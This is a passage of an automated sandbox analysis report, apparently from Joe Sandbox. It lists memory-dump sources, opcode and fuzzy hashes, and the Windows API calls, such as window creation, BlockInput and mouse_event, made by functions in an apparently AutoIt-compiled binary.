                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d369fbf1d86d14a9a22975a4e41b83b3f082e841d63b14ef13b7881d7717ffe3
                                                                                                                  • Instruction ID: 0139531fd36824d7ca0698f873bf0f940d245d748be376f6fdfd0ea408e596e9
                                                                                                                  • Opcode Fuzzy Hash: d369fbf1d86d14a9a22975a4e41b83b3f082e841d63b14ef13b7881d7717ffe3
                                                                                                                  • Instruction Fuzzy Hash: 6AB1CD21D2AF404DD623963A8835336B65CAFBB3C5F91D71BFC6A70D62EB2285C74580
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00DE0352
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: c7bfb55e100c2c37f71985aab2d1a2c431b761ba3c3edd0a59f8cf6e589094a7
                                                                                                                  • Instruction ID: 3574ede3fe238f6ae245461c8af1966728ab78900df2055ed49d3ac7ba6a2a2c
                                                                                                                  • Opcode Fuzzy Hash: c7bfb55e100c2c37f71985aab2d1a2c431b761ba3c3edd0a59f8cf6e589094a7
                                                                                                                  • Instruction Fuzzy Hash: 09112B31204295BBFB252B2D8C4AF793E15D745720F244315F922591E2CAE49D40D279
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00DDE7AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4084987330-0
                                                                                                                  • Opcode ID: 964c54f89a667264bb32dedcbad72064ac326789f6bd5691954bf1115be91193
                                                                                                                  • Instruction ID: edb9bd6c16780b9d0d6bd60a92f299464366601fec8b1ec830f87d4a31959040
                                                                                                                  • Opcode Fuzzy Hash: 964c54f89a667264bb32dedcbad72064ac326789f6bd5691954bf1115be91193
                                                                                                                  • Instruction Fuzzy Hash: 3DF0FF3510020CFFCF49AF55DC44DB93BA6EB05360B048555F9559A7A1C732ED60EB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B736: GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                    • Part of subcall function 00D8B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00DEF417,?,?,?,?,?,00000001,?), ref: 00DDEA9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2356834413-0
                                                                                                                  • Opcode ID: dd35cdf9e2e4dffb66d93859b7821741ee1b2fcd29f479cf517e47e8678255ae
                                                                                                                  • Instruction ID: d79ea7c7d0d805d9391517d9c52fe7665b5f2adc3ba9e55a9af3710527f98327
                                                                                                                  • Opcode Fuzzy Hash: dd35cdf9e2e4dffb66d93859b7821741ee1b2fcd29f479cf517e47e8678255ae
                                                                                                                  • Instruction Fuzzy Hash: EEF0A771100319ABDB147F19CC0AEBA3F61FB00750F444016F9061E291D776D861DBF1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00D8AF40,?,?,?,?,?), ref: 00D8B83B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 253fa9d7ebdee3145232ec1af15b770c463d3636a37991325bea49d8050eb2d9
                                                                                                                  • Instruction ID: 87ba1abf13cfd409d86b1afe595c9ff8ced8aec25d39b47af151f7a32b60b5f3
                                                                                                                  • Opcode Fuzzy Hash: 253fa9d7ebdee3145232ec1af15b770c463d3636a37991325bea49d8050eb2d9
                                                                                                                  • Instruction Fuzzy Hash: 6EF08234600209DFDB18EF19D8959353FB6FB45360F14866DF9524B2A0D771D850DB64
                                                                                                                  APIs
                                                                                                                  • BlockInput.USER32(00000001), ref: 00DC7057
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockInput
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3456056419-0
                                                                                                                  • Opcode ID: b957f043180484acf4317e81989f0cd4734e2cb2545790af695be3da8630b9ef
                                                                                                                  • Instruction ID: b9223cd799524a234838c7445054f9cdb83b0d7dd209344800845bbc28075f8b
                                                                                                                  • Opcode Fuzzy Hash: b957f043180484acf4317e81989f0cd4734e2cb2545790af695be3da8630b9ef
                                                                                                                  • Instruction Fuzzy Hash: 1EE048752142055FC710EFA9D408E96F7EDDF54750F00C42AF949D7351DAB0E8009BB0
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00DDF41A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 212c90067917ede75bc9460d59944869c055cc3e8864a4228cd92a7e0d26bc5c
                                                                                                                  • Instruction ID: fea446af04ac71b2611aaaffeb8131e274595eae0171a729d4088fa8a5d6f0d3
                                                                                                                  • Opcode Fuzzy Hash: 212c90067917ede75bc9460d59944869c055cc3e8864a4228cd92a7e0d26bc5c
                                                                                                                  • Instruction Fuzzy Hash: 2CF03931240289AFDB219F58DC0AF963B95EB06360F048459BA11672E1CA71A820E764
                                                                                                                  APIs
                                                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00DB7DF8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: mouse_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2434400541-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00D8ACC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00DEF3D4,?,?,?,?,?,?), ref: 00DDF450
                                                                                                                    • Part of subcall function 00DDE13E: _memset.LIBCMT ref: 00DDE14D
                                                                                                                    • Part of subcall function 00DDE13E: _memset.LIBCMT ref: 00DDE15C
                                                                                                                    • Part of subcall function 00DDE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E33EE0,00E33F24), ref: 00DDE18B
                                                                                                                    • Part of subcall function 00DDE13E: CloseHandle.KERNEL32 ref: 00DDE19D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2364484715-0
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00DDF3D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00DDF3A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D8B85B), ref: 00D8B926
                                                                                                                    • Part of subcall function 00D8B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D8B85B,00000000,?,?,00D8AF1E,?,?), ref: 00D8B9BD
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00D8AF1E,?,?), ref: 00D8B864
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2797419724-0
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00D98E1F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00D96AE9,00E267D8,00000014), ref: 00D9A937
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DCA7A5
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DCA7B7
                                                                                                                  • DestroyWindow.USER32 ref: 00DCA7C5
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DCA7DF
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DCA7E6
                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00DCA927
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DCA937
                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCA97F
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00DCA98B
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DCA9C5
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCA9E7
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCA9FA
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAA05
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DCAA0E
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAA1D
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DCAA26
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAA2D
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00DCAA38
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00DCAA4A
                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DFD9BC,00000000), ref: 00DCAA60
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00DCAA70
                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00DCAA96
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DCAAB5
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAAD7
                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCACC4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                  • Opcode ID: 2b8787a21238dc52a84ca5a1637950ecc846687d51f8b564318c100f3bea0452
                                                                                                                  • Instruction ID: 65098895e3ce9818f6d777472bf3f963029f37ea08084d809be79c210b0ed1cb
                                                                                                                  • Opcode Fuzzy Hash: 2b8787a21238dc52a84ca5a1637950ecc846687d51f8b564318c100f3bea0452
                                                                                                                  • Instruction Fuzzy Hash: AC025C75900219AFDB14DFA8DD89EAE7BBAEF48314F148159F905EB2A0DB309D41CB70
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00DDD0EB
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DDD11C
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00DDD128
                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00DDD142
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DDD151
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00DDD17C
                                                                                                                  • GetSysColor.USER32(00000010), ref: 00DDD184
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00DDD18B
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00DDD19A
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DDD1A1
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00DDD1EC
                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00DDD21E
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DDD249
                                                                                                                    • Part of subcall function 00DDD385: GetSysColor.USER32(00000012), ref: 00DDD3BE
                                                                                                                    • Part of subcall function 00DDD385: SetTextColor.GDI32(?,?), ref: 00DDD3C2
                                                                                                                    • Part of subcall function 00DDD385: GetSysColorBrush.USER32(0000000F), ref: 00DDD3D8
                                                                                                                    • Part of subcall function 00DDD385: GetSysColor.USER32(0000000F), ref: 00DDD3E3
                                                                                                                    • Part of subcall function 00DDD385: GetSysColor.USER32(00000011), ref: 00DDD400
                                                                                                                    • Part of subcall function 00DDD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DDD40E
                                                                                                                    • Part of subcall function 00DDD385: SelectObject.GDI32(?,00000000), ref: 00DDD41F
                                                                                                                    • Part of subcall function 00DDD385: SetBkColor.GDI32(?,00000000), ref: 00DDD428
                                                                                                                    • Part of subcall function 00DDD385: SelectObject.GDI32(?,?), ref: 00DDD435
                                                                                                                    • Part of subcall function 00DDD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00DDD454
                                                                                                                    • Part of subcall function 00DDD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DDD46B
                                                                                                                    • Part of subcall function 00DDD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00DDD480
                                                                                                                    • Part of subcall function 00DDD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DDD4A8
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3521893082-0
                                                                                                                  • Opcode ID: 639d62e522d399a387959f6e2606e94a7d89c4ac8a93fbe52e4f3491614b766a
                                                                                                                  • Instruction ID: 3571e047c376ce8bb5722f3b31157b699552aef7073ebec033813a75c868d17c
                                                                                                                  • Opcode Fuzzy Hash: 639d62e522d399a387959f6e2606e94a7d89c4ac8a93fbe52e4f3491614b766a
                                                                                                                  • Instruction Fuzzy Hash: 76914D72408301BFDB109F64DC48E6BBBABFB86325F144A19F962D62E0D771D944CB62
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00DCA42A
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DCA4E9
                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00DCA527
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DCA539
                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DCA57F
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00DCA58B
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00DCA5CF
                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DCA5DE
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00DCA5EE
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00DCA5F2
                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00DCA602
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DCA60B
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00DCA614
                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DCA642
                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DCA659
                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00DCA694
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DCA6A8
